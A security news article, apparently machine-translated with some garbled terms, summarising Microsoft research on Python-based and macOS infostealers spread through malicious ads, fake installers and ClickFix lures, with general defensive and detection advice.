Infosters without MacOS and Windows borders attacked by Python and malicious advertising

In recent months, threat response teams have seen a paradigm shift: campaigns that steal credentials and secrets are no longer an exclusive Windows problem and begin to thrive in macOS. According to Microsoft's security research team, attackers are taking advantage of multi-platform languages such as Python and trusted distribution networks to infect Apple users with fraudulent installers and techniques that avoid traditional detection.

The entrance door is usually a well-polished piece of social engineering. malicious ads and pages built to look like legitimate downloads lead victims looking for popular tools - for example, IA-related utilities or libraries - to DMG-format installers who, when running, deploy families of MacOS-specific infostealers. Microsoft documents campaigns that use ClickFix-type onions, a technique that deceives the user to copy and paste commands or install what he thinks is a correction or a useful tool; the result is self-infection of the computer with malware capable of exfiltering passwords, cookies and other secrets.

The names that have appeared in the reports include families such as Atomic macOS Stealer (AMOS), MacSync and DigitStealer. In other cases, the same Python-based tools facilitate the reuse and adaptation of the code for multiple operating systems, accelerating the expansion of these attacks to heterogeneous environments. Microsoft explains these observations in more detail in its technical analysis: Infosters without borders.

The attackers' technique is not limited to installing a malicious binary: many campaigns use execution without persistent files, resort to native macOS utilities and AppleScript to automate malicious tasks, and manipulate the system to collect sensitive information such as browser-saved credentials, session data and iCloud Keychain items. The risk is not only the loss of personal passwords; there are also secret development and tokens that allow access to internal infrastructure, which can result in major intrusions, corporate mail suplantations (BEC), supply chain attacks or even extortion and ransomware.

The mass distribution often goes through maldumping and SEO poising: campaigns that pay for ads or manipulate search results to redirect to cloned pages of popular tools. Google Ads and other ad platforms have been mentioned as vectors that, without additional user review, can lead to apparently legitimate downloads. To understand how malicious ads and advertising inventory quality practices influence this, read Google Ads policies and recommendations on malicious content: Google Ads policies.

The campaigns have also shown geographical and operational variations: for example, researchers have linked certain stealers written in Python to Vietnamese-speaking actors and have documented the use of messaging services such as Telegram to channel commands and filter data. In other incidents, WhatsApp has been used to spread malicious links that lead to misleading facilities, as reported by incident response teams in public analysis about these malware families.

What can a person or organization do to protect themselves? First, distrust installers that appear behind clicks in ads or sites that mimic known tools. In macOS, respect native security controls - such as Gatekeeper - and make sure to install software only from verified developers or from the App Store reduces the attack surface. Apple maintains documentation on iCloud Keychain and its security measures that it is useful to review: What is iCloud Keychain?. In addition, updating the operating system and security signatures, and using passwords and multifactor authentication managers, limits the damage if any credential item is compromised.

From the technical detection position, security teams should pay attention to atypical behavior in Terminal, unwarranted AppleScript executions, key access (Keychain) by unexpected processes and output traffic including POST requests to newly registered or relegated domains. Monitoring of egress and correlation with malicious domain intelligence herrings help to identify leaks before they become major incidents. It is also useful to review phishing response guides and credentials theft techniques published by national security teams, such as the NCSC recommendations: Tips on phishing.

In mixed environments, where macOS and Windows coexist, attackers use the same infection chains to deploy stealers on each platform. In Windows it is not rare to see persistence by registration keys or programmed tasks; in macOS persistence can try to camouflage behind user agents or cron jobs. Therefore effective protection combines prevention, detection and rapid response: continuous training of users on social engineering, technical controls that restrict the execution of unauthorized software and network rules to block domains and services used by malicious actors.

Researchers warn that the escalation of such attacks - driven by reusable languages such as Python and the exploitation of legitimate distribution channels - makes the threat rapidly evolving. For security officials and managers it is essential to maintain implementation control policies, apply network segmentation, require solid authentication and regularly review access to code secrets and repositories. Transparency in incident reports and the exchange of indicators of engagement among organizations accelerate the collective response capacity to these campaigns.

In short, the combination of malicious advertising, false installers and multi-platform stealers is a reminder: security is not only dependent on the operating system. Prevention goes through a trained human layer, up-to-date defence tools and network and endpoints controls that detect abnormal behaviors before the attackers take valuable information.

To expand the reading and consult the original Microsoft analysis, you can access the technical report here: Microsoft Security Blog. For practical guides on avoiding phishing and exfiltration of credentials, the NCSC resource collection is very useful: NCSC - Phishing. And if you want to review the policies and recommendations on malicious ads and practices on advertising platforms, see the Google Ads documentation: Google Ads policy.